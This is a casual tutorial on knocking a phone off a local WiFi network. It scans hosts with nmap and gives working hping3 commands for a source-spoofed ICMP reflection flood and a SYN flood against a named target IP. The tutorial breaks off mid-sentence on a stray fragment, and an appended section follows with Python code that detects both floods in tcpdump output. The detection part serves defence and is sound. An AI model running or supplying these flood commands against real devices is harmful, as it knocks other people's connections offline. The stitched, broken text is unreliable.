Using hping3 to conduct a DoS attack on a phone's wireless (WiFi) connection:
First, I need to enumerate the active devices on the local network.
$ ifconfig
...
wlan0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.0.117  netmask 255.255.255.0  broadcast 192.168.0.255
        inet6 fe80::80d5:9681:4291:d03f  prefixlen 64  scopeid 0x20<link>
        ether 38:68:93:41:54:10  txqueuelen 1000  (Ethernet)
        RX packets 119716  bytes 167593185 (159.8 MiB)
        RX errors 0  dropped 1  overruns 0  frame 0
        TX packets 39879  bytes 4895980 (4.6 MiB)
        TX errors 0  dropped 0  overruns 0  carrier 0  collisions 0
...
I am connected to the network using my laptop's WiFi card (wlan0).
The second line gives us all the information we need: local IP address, netmask and broadcast address.
The aim of this is to avoid collecting information on, and trying to attack, your own connection.
We will use the subnet mask and local IP address to craft and scan a range of possible IP addresses on the network. I used nmap here to run an OS detection swab of this range with:
# nmap -O 192.168.0.0-255
(You could do a ping scan with (-sn) and then attempt OS detection manually for hosts you are interested in.)
I will not paste the output of the scan here, but I found the host I want to target: 192.168.0.192
Now is where the fun begins. I will use hping3 and use source-IP spoofing to create a DoS, after deciding what options to use:
-1 ICMP mode, "just werks"
--interface INTRFC necessary to use the --rand-dest option
--rand-dest with preceding x.x.x.x will craft a random destination IP address with the rule 0<=x<=255 for each x in the IP
-a IP_ADDR specifies the spoofed source IP address which will receive responses
--flood to send packets as fast as possible
# hping3 -1 --flood --interface wlan0 -a 192.168.0.192 x.x.x.x --rand-dest
WARNING! OBTAIN AUTHORIZATION BEFORE TRYING OUT ANY SORT OF DoS!
ICMP ATTACKS CONSUME BANDWIDTH AND THIS CAN CAUSE A DoS FOR ALL DEVICES ON THE NETWORK
A more targeted attack is a SYN flood attack. We can attempt to DoS a target device or service with substantially less traffic than other DoS attacks.
-S specifies SYN (of the TCP/IP handshake)
# hping3 -S --flood -V 192.168.0.192
This
-p 443
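Seen from the defending side, both floods above leave a recognisable pattern in a packet capture. The following is an added example, not part of the original write-up: a Python check over tcpdump -nn text lines that counts half-open SYNs per service and ICMP echo replies that no request asked for. It assumes the capture was taken on the targeted host itself (so spoofed requests are not in it); the line format, thresholds, function names and sample lines are constructed for the illustration.

```python
import re
from collections import defaultdict

# Assumed input: `tcpdump -nn` text lines captured on the targeted host itself.
TCP = re.compile(r"IP (\S+)\.(\d+) > (\S+)\.(\d+): Flags \[([^\]]+)\]")
ICMP = re.compile(r"IP (\S+) > (\S+): ICMP echo (request|reply), id (\d+)")

def analyze(lines, syn_threshold=20, reply_threshold=20):
    """Return ({(dst, dport): half-open count}, {host: unsolicited echo replies})."""
    half_open = defaultdict(set)    # (dst, dport) -> {(src, sport)} SYN seen, no final ACK
    requested = set()               # (requester, responder, icmp_id) from echo requests
    unsolicited = defaultdict(int)  # host -> echo replies it never asked for
    for line in lines:
        if m := TCP.search(line):
            src, sport, dst, dport, flags = m.groups()
            if flags == "S":        # bare SYN opens a handshake
                half_open[(dst, dport)].add((src, sport))
            elif flags == ".":      # bare ACK from the client completes it
                half_open[(dst, dport)].discard((src, sport))
        elif m := ICMP.search(line):
            src, dst, kind, icmp_id = m.groups()
            if kind == "request":
                requested.add((src, dst, icmp_id))
            elif (dst, src, icmp_id) not in requested:
                unsolicited[dst] += 1
    syn = {k: len(v) for k, v in half_open.items() if len(v) >= syn_threshold}
    refl = {h: n for h, n in unsolicited.items() if n >= reply_threshold}
    return syn, refl

def sample_capture():
    """Constructed lines: both flood patterns aimed at 192.168.0.192, plus normal traffic."""
    ts = "1700000000.000000"
    out = [f"{ts} IP 192.168.0.117.{2000 + i} > 192.168.0.192.443: Flags [S], seq {i}, length 0"
           for i in range(40)]                      # SYNs that never complete
    out += [f"{ts} IP 203.0.113.{i} > 192.168.0.192: ICMP echo reply, id 1, seq {i}, length 8"
            for i in range(1, 31)]                  # replies nobody requested
    out += [                                        # one normal handshake and one normal ping
        f"{ts} IP 192.168.0.50.51000 > 192.168.0.1.80: Flags [S], seq 1, length 0",
        f"{ts} IP 192.168.0.1.80 > 192.168.0.50.51000: Flags [S.], seq 9, ack 2, length 0",
        f"{ts} IP 192.168.0.50.51000 > 192.168.0.1.80: Flags [.], ack 10, length 0",
        f"{ts} IP 192.168.0.50 > 192.168.0.1: ICMP echo request, id 7, seq 1, length 64",
        f"{ts} IP 192.168.0.1 > 192.168.0.50: ICMP echo reply, id 7, seq 1, length 64",
    ]
    return out

if __name__ == "__main__":
    print(analyze(sample_capture()))
```

A sensor elsewhere on the LAN would also see the spoofed echo requests, so there the reply check needs a different signal, such as the source MAC address not matching the claimed source IP.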